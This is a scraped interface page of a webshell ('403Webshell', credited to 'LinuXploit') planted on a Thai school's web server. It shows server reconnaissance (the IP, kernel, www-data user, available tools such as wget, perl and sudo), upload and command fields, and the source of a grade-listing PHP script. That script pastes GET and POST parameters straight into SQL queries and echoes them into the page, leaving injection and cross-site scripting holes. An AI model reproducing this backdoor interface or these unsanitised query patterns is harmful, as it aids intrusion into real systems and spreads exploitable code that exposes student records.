403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/gpa/students/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/gpa/students/nameprint.php
<html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=tis-620">

<title>ฝ่ายบริหารงานวิชาการ</title>

</head>

<body>
<?
require_once "../config/connectdb.php";
$sql2="SELECT namesc,years,termx FROM config";
$result2 = mysql_query($sql2);
while (list($namesc,$years,$termx) = mysql_fetch_row($result2)) {
$xsc_Name = $namesc;
$years1  = $years;
$termx1=$termx;
}

?>	
<?

$year=date(" Y ")+542; 
//*** Update Condition ***//
if($_GET["Action"] == "Save")
{
	for($i=1;$i<=$_POST["hdnLine"];$i++)
	{
		$strSQL = "UPDATE transcripts SET ";
		$strSQL .="total = '".$_POST["txttotal$i"]."' ";
		$strSQL .="WHERE id = '".$_POST["hdnid$i"]."' ";
		
		$objQuery = mysql_query($strSQL);
	}
	//header("location:$_SERVER[PHP_SELF]");
	//exit();
}


$strSQL = "SELECT * FROM  transcriptintall
 JOIN klw ON klw.Username=transcriptintall.idstin
 WHERE codin = '$_GET[id]' and idgrupin='$_GET[idgrupin]' and teachin='$_GET[teachin]' and yearsx='$years1'  order by idin asc";
$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");
$i = 1;







?>

<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
                
				<center><img src="./image/Card_Logo.jpg" width="80" heigth="80"></center>

</table></td>
                </tr>
              </table>
			 <center>รายชื่อนักเรียนเลือกวิชาเลือกเพิ่มเติม
				<br>
				<br>ภาคเรียนที่...........ปีการศึกษา ..................
				<br>
				<br>รหัสวิชา&nbsp;&nbsp;<? echo "$_GET[id]"; ?>
                
<form name="frmMain" method="post" action="gradesave.php?Action=Save">
<table  width="100%" border="0" bgcolor="#999999">
  <tr bgcolor="#00bfff">
    
	 <th width="10"> <div align="center">#</div></th>
    <th width="10"> <div align="center">เลขประจำตัว</div></th>
	 
	 
	 <th width="100"> <div align="center">ชื่อ-นามสกุล</div></th>
	 <th width="50"> <div align="center">ห้อง</div></th>
    <th width="10"> <div align="center">เลขที่</div></th>
	<th width="10"> <div align="center">คะแนน</div></th>
	<th width="10"> <div align="center">grade</div></th>
	<th width="10"> <div align="center">วันที่เรียน</div></th>
	<th width="10"> <div align="center">หมายเหตุ</div></th>
	
	

  </tr>
<?
$i =0;

while($objResult = mysql_fetch_array($objQuery))

{
if($bg == "#FFFFFF") { //ส่วนของการ สลับสี 
$bg = "#FFFFFF";
} else {
$bg = "#FFFFFF";
}

	$i = $i + 1;
	
	$prefix=$objResult["prefix"];
	$name=$objResult["Name"];
	$surname=$objResult["surname"];
	$room=$objResult["room"];
	$total2=$objResult["total2"];
	$dayin=$objResult["dayin"];
	$namet=$objResult["name"];
	$nametl=$objResult["lastname"];
	$nametp=$objResult["Prefix"];
	$codin=$objResult["codin"];
	$dayin=$objResult["dayin"];
	$teachin=$objResult["teachin"];
	$grupt=$objResult["grupt"];

	
?>



	<?
		
	$crsql="SELECT totalt FROM `registeacher` WHERE codeteach='$codin' and registeach='$teachin' and yearsxx='$years1'";
	$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
	$dcrd = mysql_fetch_array($slr);
	$totalinstall=$dcrd[0];
	
	?>
  <tr bgcolor="<?=$bg?>">
    <td><font size='2'><div align="center"><?=$i?></font></td>
	
	
    <td><font size='2'><?=$objResult["idstin"];?></font></td>
	
	

	
	<td><font size='2'><? echo $prefix;?><? echo $name;?>&nbsp;&nbsp;<? echo $surname;?></font></td>
                                        

	<td><font size='2'><?=$objResult["room"];?></font></td>
	
	<td><font size='2'><?=$objResult["ordinal"];?></font></td>
	<td><font size='2'><?=$objResult["total2"];?></font></td>
<td><font size='2'><? if($total2 == -1)
 {
   echo "ร";
 }
 else if($total2 == -2)
 {
   echo "มส";
 }
 else if($total2 < 50)
 {
   echo "0";
 }
 else if($total2 < 55)
 {
   echo "1";
 }
 else if($total2 < 60)
 {
   echo "1.5";
 }
  else if($total2 < 65)
 {
   echo "2";
 }
 else if($total2 < 70)
 {
   echo "2.5";
 }
  else if($total2 < 75)
 {
   echo "3";
 }
 else if($total2 < 80)
 {
   echo "3.5";
 }
 else
 {
   echo "4";
 }

 
?></font></td>
<td><font size='2'><?=$objResult["dayin"];?>

<? if($dayin ==1)
 {
   echo "จ.";
 }
 else if($dayin ==2)
 {
   echo "อ.";
 }
 else if($dayin==3)
 {
   echo "พ.";
 }
 else if($dayin==4)
 {
   echo "พฤ.";
 }
 else if($dayin==5)
 {
   echo "ศ.";
 }
 

 
?></font>



</td>
<td>
<?
									$crsql="SELECT totalt FROM `registeacher`
									WHERE yearsxx='$years1' and registeach='$teachin' and codeteach='$_GET[id]'";
									$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
									$dcrd = mysql_fetch_array($slr);
									$configmm=$dcrd[0];
									

									?>
									




<?
									$crsql="SELECT count(idstin) FROM `transcriptintall`
									WHERE  codin = '$codin' and dayin='$dayin' and teachin='$teachin'";
									$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
									$dcrd = mysql_fetch_array($slr);
									$slipnum_0=$dcrd[0];
								

									?> 
									
									
	
								
									
									
									
									
									
									
								
									
									
									<? if($i>$configmm)
 {
   echo "ลงไม่ผ่าน เกิน ตรวจสอบ";
 }
 else if($i<=$configmm)
 {
   echo "";
 }
?>
									</td>


  </tr>
<?
	  $i = $i;
  }
  ?>

</table>
  
</form>
<br>......................................................
<br>
<? echo "$nametp"; ?><? echo "$namet"; ?>&nbsp;&nbsp;<? echo "$nametl"; ?> &nbsp;&nbsp;(<? echo "$_GET[teachin]"; ?>)
<br>
ครูผู้สอน



</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit